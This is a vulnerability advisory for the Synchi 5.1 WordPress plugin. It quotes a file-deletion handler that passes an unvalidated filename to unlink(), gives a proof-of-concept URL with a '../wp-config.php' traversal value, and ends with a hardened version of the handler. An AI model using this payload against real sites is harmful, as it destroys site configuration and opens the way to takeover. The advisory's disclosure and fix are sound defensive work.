Plugin Synchi 5.1 – Arbitrary File Deletion – Unlink

Details

  • Name : Synchi
  • Version : 5.1
  • Homepage : https://wordpress.org/plugins/synchi/

Type

  • Remote Code Execution - RCE

Description

  • Required access: any registered user.
  • $_REQUEST['filename'] is not escaped or validated before it is passed to is_dir() and unlink().

Code

Path: /wp-content/plugins/synchi/synchi.php Line: 490
function synchi_action_delete_file()
{
    // get filename
    $filename = $_REQUEST['filename'];

    if (is_dir($filename)) $success = synchi_delete_directory($filename);
    else $success = unlink($filename);

    if ($success) synchi_ajax_response(true);
    else synchi_ajax_error("Unable to delete file/folder!");
}

Proof of Concept

1 – Log in with any user.
2 – Access url: http://target/wp-admin/?synchi_action&synchi_action=delete_file&filename=../wp-config.php

Results

wp-config.php is deleted and the whole system is restarted.

Note


Solution
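
A hardened form of the handler shown under Code, as an added example that is not the vendor's fix or the plugin's own code. Assumptions: deletions are confined to WP_CONTENT_DIR, the caller needs the manage_options capability, and the nonce action name synchi_delete_file and the helper synchi_resolve_inside() are hypothetical.

```php
<?php
// Added example, not plugin code. Assumed policy: only paths strictly inside
// WP_CONTENT_DIR may be deleted, and only by users with 'manage_options'.

// Return the canonical path of $requested if it lies strictly inside
// $base_dir, otherwise false. (Hypothetical helper.)
function synchi_resolve_inside($requested, $base_dir)
{
    $base = realpath($base_dir);
    $real = realpath($requested);   // collapses ../ and resolves symlinks
    if ($base === false || $real === false) {
        return false;               // base or target does not exist
    }
    // Trailing separator stops /wp-content-old matching /wp-content and
    // also rejects a request for the base directory itself.
    $base = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($real, $base, strlen($base)) === 0 ? $real : false;
}

function synchi_action_delete_file_hardened()
{
    // Authorisation: being logged in is not enough.
    if (!current_user_can('manage_options')) {
        synchi_ajax_error("Permission denied!");
        return;
    }
    // CSRF: aborts the request when the nonce is missing or invalid.
    // 'synchi_delete_file' is an assumed action name.
    check_ajax_referer('synchi_delete_file');

    $filename = isset($_REQUEST['filename']) ? wp_unslash($_REQUEST['filename']) : '';
    if (!is_string($filename) || $filename === '') {
        synchi_ajax_error("Missing filename!");
        return;
    }

    // ../wp-config.php canonicalises to a path outside wp-content and fails here.
    $target = synchi_resolve_inside($filename, WP_CONTENT_DIR);
    if ($target === false) {
        synchi_ajax_error("Invalid path!");
        return;
    }

    $success = is_dir($target) ? synchi_delete_directory($target) : unlink($target);

    if ($success) synchi_ajax_response(true);
    else synchi_ajax_error("Unable to delete file/folder!");
}
```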


Timeline

  • Date Discovery : 11/22/2017
  • Date Vendor Contact : 12/24/2017
  • Date Publish :
  • Date Resolution :
